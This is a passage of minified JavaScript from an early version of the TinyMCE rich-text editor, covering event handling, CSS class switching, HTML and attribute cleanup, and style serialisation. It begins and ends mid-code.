i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, 